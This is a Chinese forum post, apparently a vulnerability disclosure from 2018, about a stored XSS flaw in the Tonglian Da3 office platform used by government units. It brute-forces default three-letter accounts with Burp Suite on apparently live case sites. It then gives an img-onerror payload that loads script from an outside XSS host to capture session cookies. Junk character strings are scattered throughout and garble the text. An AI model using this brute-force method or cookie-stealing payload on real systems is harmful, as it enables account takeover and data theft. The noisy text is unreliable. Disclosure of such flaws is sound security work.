( N9 Q) G5 ], h3 y4 a% Y
9 F# s, @6 U( Q" U 同联Da3协同办公平台后台通用储存型xss漏洞$ ^7 Z. h7 Y8 M' c. `
5 _) @4 @& ~5 o8 A2 m ' v' G) ?. ] c9 A; R
平台简介:
8 x5 V9 Y9 |) E
* }( L$ y1 d) G5 b 0 ~' ~, g, i; r/ `- v* `
; Q$ R, h( R/ o% J* s( W
0 P8 P/ p; E5 Y2 b; H1 M
2 U) Z% K& Z: v O 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
0 \8 F1 ~; r# O: m# f
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
0 S8 J" N) ^& Q$ \同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
7 {1 @/ e, r9 [, ?1 ~+ K) V
_0 A# Y/ ^+ w/ u F+ r+ J 6 P5 N* }$ ?% Y
+ a3 K+ B- L& c9 A; A2 J( _8 f- V
6 C4 _# H% y0 s& F . e. g+ }. S. m; Z0 e
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. o# k' A$ V# v% N! l8 b5 `8 C3 I
" k' c1 ~/ J/ E! V# i0 x9 J 4 ], {8 E4 j6 N% Q9 w
/ X9 o0 H: r$ c# c% v
% D& [( c- X+ A: ^. M* z
8 z" E) B- \8 ^ j http://1.1.1.1:7197/cap-aco/#(案例2-)
2 Q" d: X2 p* Y5 p
* o' P$ z' _3 y+ h1 n
1 I, m! ~' h( f# S8 W
http://www.XXOO.com (案例1-官网网站)
& o3 ~/ G$ ?; O4 P) _; t, N) W
) r5 @/ [6 ]; e R7 w
$ l' c* S; g( A5 X/ ^ 漏洞详情:
. w7 ~% u" y" X( W. w2 ]
4 i8 N1 E3 x L5 V3 s! e( ]+ u2 ~
0 u8 a0 g, {+ c+ x8 w& ] 案例一、
1 ^' Z' N8 S0 a
% C! o; H$ H! H8 M' b
* R i! y% ~( x D D& l$ E
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
1 N$ A' v0 H/ R2 K2 [
% o! l7 w8 j8 w9 b" D7 ?6 c * o: J7 u& j9 y2 q
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
: t l: t6 Y: t
# ^8 ]' }/ k. _
$ V5 ^ L+ g! N# x* y7 Q6 a
' Z. p: I5 Z, C" i4 L
7 U5 t9 z7 ~' {
+ H1 ^# e6 e" h6 A7 e/ k
% x. ^* i# `. a: P i4 h$ `: `& |
7 |+ p; K+ P8 g: V
, b5 Z( l8 S- i* Z8 {( [& K
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
; U. d3 x+ O$ G8 {" {5 M
$ x; b0 B( i0 p
2 p5 @5 W7 N! [4 S* ~ ! g" W- V. A: H' f: `7 ?
) P. S6 a0 t* d: U
, Z, [# B; f8 A9 \* j# _7 [6 n' M 
: s7 Z! J" b- }' G7 @4 |. Q
9 @! f3 L/ P1 ~# `. v . H* c2 I& f# @( b
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 8 j8 F$ [. L% E+ j4 k/ K- z
) c8 ~, [8 i* @- o/ ^, x5 c2 C
7 l: `# e& `8 E4 j
* O' g3 W! ]5 M* P- H+ Z
: C7 H2 }) G- B. e8 U: ? - C% n$ S& `9 N) k: I" z9 W4 J
<img src=x* w6 P* J& n5 c7 T9 j
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
' l, P6 E/ C* n2 ~
$ {" i0 |1 a' k/ a ( m3 z' L/ N$ s& a) v& P
5 P0 S) s2 i2 }6 s
?3 ]% \$ T/ n5 }7 e
7 t: d, u" N. S) @, E& J6 c 然后发送,接收cookie如图: 2 k T X4 \/ h& K* X3 V6 _8 Z+ l' [+ m
" K z- V+ W' p/ {( M1 \ 9 K. y( i5 n' l& N
# k% y8 {' N; i1 c
+ q# u* h, q$ O * I8 h+ H+ D0 f- Y; g/ n
& F7 F3 _& B) D/ C" N
0 k+ g @- Z9 {0 F' Q
) i- M4 D5 A. |" G; @
: W2 L' D# r" `* q' x# \7 ^: K
! r: C D; z; Z7 y8 H
: q# d* K, }0 H1 f: h
~# ~( G0 [* @& a: |. G2 n
& c4 a8 Q* Q, R) ?3 }/ ]
1 F. X% ?8 Q/ w- _ f 
7 Y3 o. d$ W* e, H% a6 H/ U
* ]7 p% ?* z8 Z' J7 C
+ c7 t2 S" O- `% X- a( [7 f3 P7 A 
b$ ?" R6 N& D4 ~/ L
0 Z _6 D% f' n t2 E( Z
4 M [7 U# O4 j4 A* J# o& q * ]! B5 i1 @6 }8 O+ K; l, R y
; ], X% @7 K0 A D3 m
: u+ [1 X( u- ^) q6 B, j
案例2、
, G8 G7 c; e0 \( d5 P& {. R
/ U& x4 V! }+ F, v
1 C, o2 a& x. `9 \
前面步骤都一样,下面看效果图: - U& E7 }8 [$ o9 O
, f( e/ O8 o l! \- [' u
+ W$ V& V! H$ l% w8 W
/ Z7 J& x: Z* v1 C7 Z
J$ Y) M, H. U
3 K7 D6 B( N) \6 R; S" L
; s7 L' q* Y0 ^0 a9 T
* i0 w6 }& l6 w' h 5 V: A+ x, Y* I* |2 W4 ~9 O
: N$ }) t1 c8 { v7 Q9 V' ^" S
/ k9 U) A/ p# D+ d/ ^% S
1 j7 H# S% i( z( z0 ?! y
! C O& @. J# w1 P
) H1 h- Q, o& m9 I# f. K" n5 T
2 ?+ ^) {, Y; D. L
. b v% Z/ {8 |4 q
- @9 x* w8 Z3 W# i
8 ^: m+ M9 _3 ]5 X# ?% G- i+ Z3 P
* a" Z, a/ ^! D: U# l9 g2 A( w- @! P; r
) ?! x9 f3 x# z9 B
0 c' S- H8 I+ |3 P) ]. z0 x" G
. Q$ ^: `+ P- s# _: s7 ]& S
1 {: {% l& _- ?$ P
$ s1 S5 v* P' H
: F. V* J! o/ W, z$ W b9 @
2 y n5 g0 g- z/ g2 I* b5 J/ F
D4 h% h: ~7 @. v
& Z. k: }" Q5 Q6 o" m
# A' S5 P6 e8 v, [& l8 X 
发表于 2018-10-20 20:14:15